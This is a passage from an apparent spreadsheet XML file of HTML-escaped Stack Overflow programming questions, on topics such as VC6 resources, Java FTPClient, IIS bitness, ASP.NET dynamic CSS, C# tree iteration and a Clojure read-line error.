&lt;li&gt;If no, what alternatives are there to localizing our &lt;code&gt;UserControl&lt;/code&gt;'s? e.g. post-processing somehow, different file format, etc.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Adding resource file to VC6 dll</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a number of VC 6.0 projects (dsps) which build into dlls which don't have resource files. Any idea how to add resources into an existing project?&lt;/p&gt;
&lt;p&gt;The project is due for a major release shortly and I want to add a fileversion to those dlls currently lacking one. The dlls will be recompilied before release so I'm just trying to make these dsps like all the others I've inherited with this project (that do have a file and product version etc so that we can easily tell exactly what is running on a customer's machine.&lt;/p&gt;
&lt;p&gt;One answer : Create an *.rc and resource.h file (copy from another project?) and add it to the source folder of ypur project in VC6 file view. The resource view is automatically created. Thanks for your help guys, gave me the pointers I needed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint: Back up single page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to back up a sharepoint web page which containts web parts and other html tweaks.  I would like to keep a back up of the page itself with the web parts in the appropriate places, is this possible?  Right now I just opened SharePoint designer, opened my page and saved as to my hard drive.  Is there another way?  Is this a complete back up of the page? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reporting Services - Rendering to Excel in C# WinForm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WinForms application that can call for and display a number of reporting services reports. I can call the &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LocalReport.Render("Excel", null, out mimeType, out encoding, out filenameExtension, out streamids, out warnings); 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;method - writing to a byte[] array, but it throws an exception &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The source of the report definition has not been specified. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anyone know how to solve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with FTPClient class in java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using org.apache.commons.net.ftp.FTPClient and seeing behavior that is, well... perplexing.&lt;/p&gt;
&lt;p&gt;The method beneath intends to go through an FTPFile list, read them in and then do something with the contents.  That's all working. What is not (really) working is that the FTPClient object does the following...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1) Properly retrieves and stores the FIRST file in the list  
2) List item evaluates to NULL for x number of successive iterations of the loop (x varies on successive attempts  
3) manages to retrieve exactly 1 more file in the list  
4) reports that it is null for exactly 1 more file in the list  
5) hangs indefinitely, reporting no further activity.
public static String mergeXMLFiles(List&amp;lt;FTPFile&amp;gt; files, String rootElementNodeName, FTPClient ftp){
    	String ret = null;
    	String fileAsString   = null; 
    	//InputStream inStream;
    	int c;
    	if(files == null || rootElementNodeName == null)
    		return null;
    	try {
    		System.out.println("GETTING " + files.size() + " files");
    		for (FTPFile file : files) {
    			fileAsString = "";
    			InputStream inStream = ftp.retrieveFileStream(file.getName());
    			if(inStream == null){
    				System.out.println("FtpUtil.mergeXMLFiles() couldn't initialize inStream for file:" + file.getName());
    				continue;//THIS IS THE PART THAT I SEE FOR files [1 - arbitrary number (usually around 20)] and then 1 more time for [x + 2] after [x + 1] passes successfully.
    			}
    			while((c = inStream.read()) != -1){
    				fileAsString += Character.valueOf((char)c);
    			}
    			inStream.close();
    			System.out.println("FILE:" + file.getName() + "\n" + fileAsString);
    		}
    	} catch (Exception e) {
    		System.out.println("FtpUtil.mergeXMLFiles() failed:" + e);
    	}
    	return ret;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;has anyone seen anything like this? I'm new to FTPClient, am I doing something wrong with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the pros and cons of running IIS as 32bit vs 64bit on a 64bit OS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Possibly better suited for "Rack Overflow", but from a developer's point of view, what are the advantages and disadvantages of running IIS (serving both legacy classic ASP and .NET) as a 32bit process instead of a 64bit process on a 64bit windows host? &lt;/p&gt;
&lt;p&gt;The main advantage of 32/64 (iis/server) over 32/32 seems to be the ability to go up to 4gb in memory per IIS process. &lt;/p&gt;
&lt;p&gt;The advantages I expect of 32/64 over 64/64 appear to be that it's easier to access legacy 32-bit in-process DLLs (of which we still have one from a partner vendor we can't move away from immediately) and perhaps a smaller memory footprint for the same code given smaller memory pointers. &lt;/p&gt;
&lt;p&gt;Are there any performance benefits of 64/64 over 32/64 or anything else that would warrant a full switch now? Have I made any false assumptions here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to refresh a CSS sheet with an AJAX postback?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been learning how to create dynamic images and dynamic stylesheets using ASP.NET 3.5.  My reasoning behind this is I have a web page that I want to change the header background image (set with css) automatically.  Check below for my test script:&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Page Language="VB" AutoEventWireup="false" CodeFile="Default.aspx.vb" Inherits="_Default" %&amp;gt;
&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml"&amp;gt;
&amp;lt;head runat="server"&amp;gt;
    &amp;lt;title&amp;gt;&amp;lt;/title&amp;gt;
    &amp;lt;%
        Response.Output.WriteLine("&amp;lt;link rel=""Stylesheet"" type=""text/css"" href=""style.aspx?t={0}&amp;amp;v={1}"" /&amp;gt;", oType, oText)
    %&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;form id="form1" runat="server" action="Default.aspx"&amp;gt;
        &amp;lt;asp:ScriptManager ID="ScriptManager1" runat="server" /&amp;gt;
        &amp;lt;asp:UpdatePanel ID="UpdatePanel1" runat="server"&amp;gt;
            &amp;lt;ContentTemplate&amp;gt;
                &amp;lt;div class="testheader"&amp;gt;&amp;amp;nbsp;&amp;lt;/div&amp;gt;
                &amp;lt;asp:Label ID="Label1" runat="server" Text="Label"&amp;gt;&amp;lt;/asp:Label&amp;gt; &amp;lt;%-- for testing --%&amp;gt;
            &amp;lt;/ContentTemplate&amp;gt;
            &amp;lt;Triggers&amp;gt;
                &amp;lt;asp:AsyncPostBackTrigger ControlID="Button1" EventName="Click" /&amp;gt;
            &amp;lt;/Triggers&amp;gt;
        &amp;lt;/asp:UpdatePanel&amp;gt;
        &amp;lt;asp:Button ID="Button1" runat="server" Text="Button" /&amp;gt;
    &amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So nothing special about the default form page above, it has an DIV styled to have the dynamic background image and a Label, which as the comment indicates is just to make sure my AsyncPostBack is functioning properly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Partial Class _Default
    Inherits System.Web.UI.Page
    Public oType As String = "m"
    Public oText As String = "Genius on the Web"
    Protected Sub Button1_Click(ByVal sender As Object, ByVal e As System.EventArgs) Handles Button1.Click
        Select Case oType
            Case "m"
                oType = "c"
            Case "c"
                oType = "m"
        End Select
        Label1.Text = Now.ToString
    End Sub
End Class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Again, nothing fancy.  Just swaps the two values I have temporarily hard-coded into the program, and updates the Label text.&lt;/p&gt;
&lt;p&gt;This is my dynamic stylesheet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ Page Language="VB" %&amp;gt;
&amp;lt;%  
    Response.ContentType = "text/css"
    Dim qString As String = Request.QueryString("t")
    Dim bText As String = Request.QueryString("v")
    If String.IsNullOrEmpty(qString) Then qString = "blank"
    If String.IsNullOrEmpty(bText) Then bText = "Placeholder"
    Dim theColor, H1size, bannerImg As String
    Select Case qString
        Case "c"
            theColor = "green"
            H1size = 30
        Case "m"
            theColor = "blue"
            H1size = 26
        Case Else
            theColor = "red"
    End Select
    bannerImg = String.Format("image.aspx?t={0}&amp;amp;p={1}", Server.UrlEncode(bText), qString)
    %&amp;gt;
body { background-color: &amp;lt;%=theColor%&amp;gt;; }
.testheader { background: url(&amp;lt;%=bannerImg%&amp;gt;); background-repeat:no-repeat; height:120px; }
.testclass { font-size: &amp;lt;%=H1size%&amp;gt;px; border:1px solid yellow; margin-bottom:2em; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, here is my dynamic image script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    Response.ContentType = "image/jpeg"
    Response.Clear()
    Response.BufferOutput = True
    Try
        Dim oText As String = Server.HtmlDecode(Request.QueryString("t"))
        If String.IsNullOrEmpty(oText) Then oText = "Placeholder"
        Dim oPType As String = Server.HtmlDecode(Request.QueryString("p"))
        If String.IsNullOrEmpty(oPType) Then oPType = "none"
        Dim imgPath As String = ""
        Select Case oPType
            Case "c"
                imgPath = "img/banner_green.jpg"
            Case "m"
                imgPath = "img/banner_blue.jpg"
            Case Else
                Throw New Exception("no ptype")
        End Select
        Dim oBitmap As Bitmap = New Bitmap(Server.MapPath(imgPath))
        Dim oGraphic As Graphics = Graphics.FromImage(oBitmap)
        Dim frontColorBrush As New SolidBrush(Color.White)
        Dim oFont As New Font(FONT_NAME, 30)
        Dim oInfo() As ImageCodecInfo = ImageCodecInfo.GetImageEncoders
        Dim oEncoderParams As New EncoderParameters(1) 'jpeg
        Dim xOffset As Single = Math.Round((oBitmap.Height - oFont.Height) / 2, MidpointRounding.ToEven)
        Dim oPoint As New PointF(275.0F, xOffset + 10)
        oEncoderParams.Param(0) = New EncoderParameter(Encoder.Quality, 100L)
        oGraphic.TextRenderingHint = Drawing.Text.TextRenderingHint.AntiAlias
        oGraphic.DrawString(oText, oFont, frontColorBrush, oPoint)
        oBitmap.Save(Response.OutputStream, oInfo(1), oEncoderParams)
        Response.Output.Write(oBitmap)
        oBitmap.Dispose()
        oGraphic.Dispose()
        Response.Flush()
    Catch ex As Exception
    End Try
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;So armed with this information, I want to know if it is possible for the AsyncPostBack refresh the CSS so that the image will change when I click Button2. I am open for suggestions and/or "thats the stupid/hard way to do this, try this..." type of feedback.&lt;/p&gt;
&lt;p&gt;Thanks guys!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL: SELECT from another server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm afraid that I already know the answer to my question, but I'll ask it anyway:&lt;/p&gt;
&lt;p&gt;When there are two MySQL DB servers, can I access data that is stored on the other server? &lt;/p&gt;
&lt;p&gt;In other words: Can I somehow do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO table (x, y, z)
   SELECT x, y, x+y
      FROM [otherserver].[database].[table]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is the answer really as short as "No"?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the shortest way to implement a proxy or decorator class in c#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you have a class car that implements IVehicle and you want to wrap it in a decorator that forwards all calls to car and counts them, how would you do it?&lt;/p&gt;
&lt;p&gt;In Ruby I could just build a decorator without any methods and use method_missing to forward all calls to the car object.&lt;/p&gt;
&lt;p&gt;In Java I could build a Proxy object that runs all code through one method and forwards it afterwards.&lt;/p&gt;
&lt;p&gt;Is there any similiar thing i can do in C#?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;update:&lt;/p&gt;
&lt;p&gt;based on the answeres and what iÂ´ve read about System.Reflection.Emit it should be possible to write a method similiar to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Type proxyBuilder(Type someType, delagate functionToBeApplied, Object forward)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where type implements all interface of someType, executes functionToBeApplied and then forwards the method call to object while returning its return.&lt;/p&gt;
&lt;p&gt;Is there some lib that does just that or would i have to write my own?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC RC ajax onsubmit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The problem with onsubmit still continues when I even use preventDefault option. My problem is the same with &lt;a href="http://stackoverflow.com/questions/237691/aspnet-mvc-beta-ajax-upgrade-problem"&gt;Asp.net mvc beta ajax problem&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% using (this.Ajax.BeginForm("den2",
                              "Deneme",
                              null,
                              new AjaxOptions {
                                   UpdateTargetId = "panel1",
                                   InsertionMode=InsertionMode.Replace
                              },
                              new { id = "panelOneForm" })) { }  %&amp;gt;
&amp;lt;div class="panel" id="panel1"&amp;gt;
   &amp;lt;img src="/Content/ajax-loader.gif" /&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;script type="text/javascript"&amp;gt;
   $get("panelOneForm").onsubmit({ preventDefault: function() { } });
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This time I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;e.type is undefined
var etype = this.type = e.type.toLowerCase();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I debug it :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; var e = Function._validateParams(arguments, [
 {name: "eventObject"} ]);
 if (e) throw e;
 var e = eventObject;
 var etype = this.type = e.type.toLowerCase();
 this.rawEvent = e;
 ...(function continues) at MicrosoftAjax.debug.js line 2862
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to solve it or should I pass each parameter property used in this method?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi 2009 classes / components to read/write file permissions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have a set of classes / components that will work with Delphi 2009 (Unicode) to read and write NTFS file permissions?&lt;/p&gt;
&lt;p&gt;There was a thing called "NTSet" - but they stopped development at Delphi 2006 about 3 years ago :-(&lt;/p&gt;
&lt;p&gt;Any other takers??&lt;/p&gt;
&lt;p&gt;Thanks!
Marc&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Large Tree Iteration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large result set assembled in a parent/child relationship.  I need to walk the tree and display the results to the user.  &lt;/p&gt;
&lt;p&gt;I've done this before using recursion, but because my result set may be large, I want to avoid the possibility of receiving a StackOverflowException.&lt;/p&gt;
&lt;p&gt;I found the following &lt;a href="http://msdn.microsoft.com/en-us/library/bb513869.aspx" rel="nofollow"&gt;example&lt;/a&gt; on MSDN which uses a Stack.  The problem I'm having is because a stack is last-in first-out, my data doesn't appear properly.  I'd like it to look like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
LeveL 1
Level 1.1
Level 1.1.1 
Level 1.1.2 
Level 1.2 
Level 1.2.1 
Level 1.2.2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
LeveL 1
Level 1.2 
Level 1.2.2 
Level 1.2.1 
Level 1.1 
Level 1.1.2 
Level 1.1.1 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Here is an example of my code.  Assuming the &lt;code&gt;DataTable dt&lt;/code&gt; has the following columns: ID, ParentID, and Text&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    private struct Item
    {
        public string Text;
        public int ID;
        public int ParentID;
    }
    private void BuildView()
    {
        Stack&amp;lt;Item&amp;gt; itemTree = new Stack&amp;lt;Item&amp;gt;(40);
        //Get All Parent Nodes
        DataView dv = new DataView(dt);
        dv.RowFilter = "ParentID = 0";
        //Add the parent nodes to the stack
        foreach (DataRowView drv in dv)
        {
            Item item = new Item();
            item.Text = drv["Text"].ToString();
            item.ID = drv["ID"].ToString();
            item.ParentID = drv["ParentID"].ToString();
            itemTree.Push(item);
        }
        //Go through the stack one node at a time
        while (itemTree.Count &amp;gt; 0)
        {
            Item currentItem = itemTree.Pop();
            Debug.WriteLine(currentItem.Text);
            //Get children of current node
            dv.RowFilter = String.Format("ParentID = {0}", currentItem.ID);
            if (dv.Count &amp;gt; 0)
            {
                //Add child nodes to the stack
                foreach (DataRowView drvChild in dv)
                {
                    Item item = new Item();
                    item.Text = drvChild["Text"].ToString();
                    item.ID = drvChild["ID"].ToString();
                    item.ParentID = drvChild["ParentID"].ToString();
                    itemTree.Push(item);
                }
            }
        }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>quaternion libraries in C/C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any good libraries for &lt;em&gt;quaternion&lt;/em&gt; calculations in C/C++ ? &lt;/p&gt;
&lt;p&gt;Side note: any good tutorials/examples? I've google it and been to the first few pages but maybe you have have some demos/labs from compsci or math courses you could/would share? &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create XML Nodes based on XPath?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of an existing means of creating an XML hierarchy programatically from an XPath expression? &lt;/p&gt;
&lt;p&gt;For example if I have an XML fragment such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;feed&amp;gt;
    &amp;lt;entry&amp;gt;
        &amp;lt;data&amp;gt;&amp;lt;/data&amp;gt;
        &amp;lt;content&amp;gt;&amp;lt;/content&amp;gt;
    &amp;lt;/entry&amp;gt;
&amp;lt;/feed&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Given the XPath expression /feed/entry/content/@source I would have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;feed&amp;gt;
    &amp;lt;entry&amp;gt;
        &amp;lt;data&amp;gt;&amp;lt;/data&amp;gt;
        &amp;lt;content @source=""&amp;gt;&amp;lt;/content&amp;gt;
    &amp;lt;/entry&amp;gt;
&amp;lt;/feed&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I realize this is possible using XSLT but due to the dynamic nature of what I'm trying to accomplish a fixed transformation won't work.&lt;/p&gt;
&lt;p&gt;I am working in C# but if someone has a solution using some other language please chime in.&lt;/p&gt;
&lt;p&gt;Thanks for the help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Callback and asp.net gridview</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a following situation. I have a gridview and I need to dynamically add rows to it. All works fine and dandy. However, lately, I have been curious about making this process faster and more usable. I found a Callback feature in asp.net 2.0.&lt;/p&gt;
&lt;p&gt;It seems to make sense for a case when the gridview is used ti display something. Adding a row programmatically however, requires to add a row to DataTable (that's gridview bound to). Since DataTable resides on the server, from what I understand it doesn't make sense here to use Callback....&lt;/p&gt;
&lt;p&gt;&lt;a href="http://csharpfeeds.com/post/4287/Asynchronous_GridView_in_5_simple_steps.aspx" rel="nofollow"&gt;this&lt;/a&gt; is a nice tutorial that outlines main things.&lt;/p&gt;
&lt;p&gt;in step 5:&lt;/p&gt;
&lt;p&gt;"To finish the asynchronous loading we have to implement the two methods that are defined by the ICallbackEventHandler interface we implemented in step 3. One of the methods binds a DataTable to the GridView and renders the control."&lt;/p&gt;
&lt;p&gt;from that I gather that there is no way to make dynamically adding rows to gridview w/o postbacks....any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting strings to enum in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/16100/converting-a-string-to-an-enumeration-value-in-c"&gt;Strings to enum in C#&lt;/a&gt;, how do you normally converting strings to enum in C++. Any helper function that you use, is it a good idea to do this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting started in Unit Testing as a group in these economic times</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a group of a few developers and some business analysts. We as developers would like to start adding unit testing as part of our coding practices so that we can deliver maintainable and extensible code, especially since we will also be the ones supporting and enhancing the application in the future. But in this economic downturn we are struggling with the push to get started because we are challenged to just deliver solutions as fast as possible, with quality not being the top priority. What can we do or say to show that we will be able to deliver faster and with higher quality, as well as preparing for future enhancements.&lt;/p&gt;
&lt;p&gt;Basically we just need to get over the learning curve of incorporating unit testing into our daily work, but we cannot do that now because it is viewed as an unnecessary overhead that would delay our projects that the business needs now.&lt;/p&gt;
&lt;p&gt;We as developers want to provide the highest value to the business, especially quickly, but we know that we will also need to do this 6 months from now and we need to plan for that as well, and we believe that unit testing will help us greatly down the line.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;
All awesome input, thank you. I personally know how to write unit test, but I don't have the experience in me to say whether or not that unit test is good. I have just ordered &lt;a href="http://rads.stackoverflow.com/amzn/click/0321146530" rel="nofollow"&gt;Test Driven Development: By Example&lt;/a&gt; and will take the initiative to get the ball rolling on incorporating unit testing in our group.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open a file and write contents to a DIV, span, label, some kind of container</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™d like to be able to open a text/html file and write its contents to a container, either an HTML div or an asp label would be fine. 
How do I go about doing this in the C# codefile for the page in question?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you manage your time as a team leader?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where I work, my role has been evolving from a pure development role to team leadership. I find that this suits me, and I'm generally enjoying it.&lt;/p&gt;
&lt;p&gt;One aspect of the job that continually vexes me, though, is time management. My day used to be pure coding. Now, I still have a largely full plate of coding duties, but I'm expected to mentor other developers, work on requirements, make design decisions for other developers, evaluate bug reports from users, assign them to developers, and so on.&lt;/p&gt;
&lt;p&gt;I find that my day has become one interruption after another and the prolonged periods of sustained concentration needed to get any actual quality coding done are becoming rarer and rarer. &lt;/p&gt;
&lt;p&gt;Today, I finally grabbed my laptop and escaped to a coffee shop so I could get some actual work done. &lt;/p&gt;
&lt;p&gt;How do the team leads here manage their day -- or manage their workplace -- so they don't let their administrative tasks overwhelm them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java equivalent of unsigned long long?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C++, I enjoyed having access to a 64 bit unsigned integer, via &lt;code&gt;unsigned long long int&lt;/code&gt;, or via &lt;code&gt;uint64_t&lt;/code&gt;. Now, in Java longs are 64 bits, I know. However, they are signed.&lt;/p&gt;
&lt;p&gt;Is there an unsigned long (long) available as a Java primitive? How do I use it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom authentication at the URL level, use ISAPI still with .NET or is there a new way?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a non-IIS way of authenticating users that is not with HTML?&lt;/p&gt;
&lt;p&gt;I know I can create my own ISAPI filter for IIS, but I want to achieve the same thing, with .NET code and not integrate it with IIS.&lt;/p&gt;
&lt;p&gt;Is there a way to do this now, with the latest .NET, or is ISAPI still the way to go?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MS CRM Custom Workflow to access Project Server web service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a custom workflow in ms crm 4 so that when a task is completed it will take some of the attributes of the task and add an entry in project server on a timesheet. I am able to access the project server web services (PSI) and create a time sheet entry from a c# console app and I can do other custom workflows in crm not related to project server.  When using the Project Server web services (PSI) I have to reference and include 3 office project dll's but I am unsure how to get those registered in CRM when i do the custom workflow plugin registration.  Any thoughts would be helpful.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to skip some section of text while speaking using SSML</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there some SSML tags etc, to remove a particular line of text from speaking. Yes, I know I can remove this using string functions, before sending it to the speech synthesizer. But my question is, is there any way to mark or tag some text, so that it won't play. I am looking for some XML based solution for this issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Virtual COM Ports in Windows - Fax emulator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Windows application that utilizes a 3rd-party tool (&lt;a href="http://data-tech.com/products/fax.aspx" rel="nofollow"&gt;FaxMan&lt;/a&gt;) to send faxes via a COM port attached to the PC.  In order to stress test my application I want to create some virtual COM ports that pretend to have fax modems attached.  I then want to 'spoof' the sending of faxes, without physically sending anything.  The virtual COM ports would need to respond to standard AT commands as if the fax was being sent.  The ability to spoof failures would be an added bonus.&lt;/p&gt;
&lt;p&gt;My first thoughts are using a virtual COM port driver to redirect to a telnet or other TCP session - I could then have a TCP server that pretends to go through the fax motions.  However, I am happy to pay for a component if one exists.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to bind nested objects, or master-detail-binding, in code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a three nested classes, Show, Season and Episode, where a show has seasons, and seasons has episodes. &lt;/p&gt;
&lt;p&gt;I want to bind two listboxes so that the first lists seasons, and the second lists episodes in that season.&lt;/p&gt;
&lt;p&gt;How can I do this? I prefer to set this up in code, not xaml, but if you know how to do it with xaml, it's better than nothing..&lt;/p&gt;
&lt;p&gt;A simplifyed xaml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Window&amp;gt;
  &amp;lt;Label name="Showname" /&amp;gt;
  &amp;lt;ListBox name="Seasons" /&amp;gt;
  &amp;lt;ListBox name="Episodes" /&amp;gt;
&amp;lt;/Window&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and some relevant code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Window1 : Window
{
  public Data.Show show { get; set; }
  public Window1()
  {
    this.DataContex = show;
    //Bind shows name to label
    Binding bindName = new Binding("Name");
    ShowName.SetBinding(Label.ContentProperty, bindName);
    //Bind shows seasons to first listbox
    Binding bindSeasons = new Binding("Seasons");
    Seasons.SetBinding(ListBox.ItemsSourceProperty, bindSeasons);
    Seasons.DisplayMemberPath = "SeasonNumber";
    Seasons.IsSyncronizedWithCurrentItem = true;
    //Bind current seasons episodes to second listbox
    Binding bindEpisodes = new Binding("?????");
    Episodes.SetBinding(ListBox.ItemsSourceProperty, bindEpisodes);
    Episodes.DisplayMemberPath = "EpisodeTitle";
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone got any clues how to bind up the second listbox?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add authentication to subfolders without creating a web application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an existing publicly accessible web application with user controls, data access libraries, graphics, etc. We want to create a new secure section of the site that accesses some of the already existing resources.&lt;/p&gt;
&lt;p&gt;Initially we created the new section of the site as a virtual directory which (we hoped) would allow us to access the parent site's resources. We added the appropriate location information to the base web.config (authentication and authorization) but we continue to see the following error "Parser Error Message: It is an error to use a section registered as allowDefinition='MachineToApplication' beyond application level.  This error can be caused by a virtual directory not being configured as an application in IIS."&lt;/p&gt;
&lt;p&gt;In response to that error we created the directory as a new application. This allows us to authenticate properly but has the drawback of not being able to access any of the resources in the parent directory (since it's outside the application scope).&lt;/p&gt;
&lt;p&gt;Is there any way to secure the new section of the site while at the same time utilize the already existing resources?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good pattern for inexact queries in the Google App Engine Datastore?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Google App Engine Datastore querying language (gql) does not offer inexact operators like "LIKE" or even case insensitivity.  One can get around the case sensitive issue by storing a lower-case version of a field.  But what if I want to search for a person but I'm not sure of the spelling of the name?  Is there an accepted pattern for dealing with this scenario?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to clear file path history from the file explorer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Under Microsoft Vista, the windows file explorer keeps paths and occasionally files in its history. This history can be seen by selecting the pull-down from the box at the top that keeps lists the current directory. I'd like to clear out that list, but I don't see an easy way to do it.&lt;/p&gt;
&lt;p&gt;To clarify, I am talking about the file explorer (explorer.exe), not Internet Explorer (iexplorer.exe).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF Self-hosted service, client clean-up on service stop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm curious to know how I would go about setting up my service to stop cleanly on the server the service will be installed on.  For example when I have many clients connecting and doing operations every minute and I want to shut-down the service for maintenance, how can I do this in the "OnStop" event of the service to then let the main service host to deny any new client connections and let the current connections finish before it actually shuts down its services to the client, this will ensure data isn't corrupted on the server as the server shuts down.&lt;/p&gt;
&lt;p&gt;Right now I'm not setup as a singleton because I need scalability in the service.  So I would have to somehow get my service host to do this independently of knowing how many instances are created of the service class.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Clojure read-line function problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get console input in my Clojure program, but when it gives me this error when it gets to that part of the program.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception in thread "main" java.lang.ClassCastException:
clojure.lang.LineNumberingPushbackReader cannot be cast to java.io.BufferedReader
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the 'read' function works, but it's not what I need. Here is the code I'm using.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(defn prompt-read [prompt]
  (print (format "%s: " prompt))
  (flush )
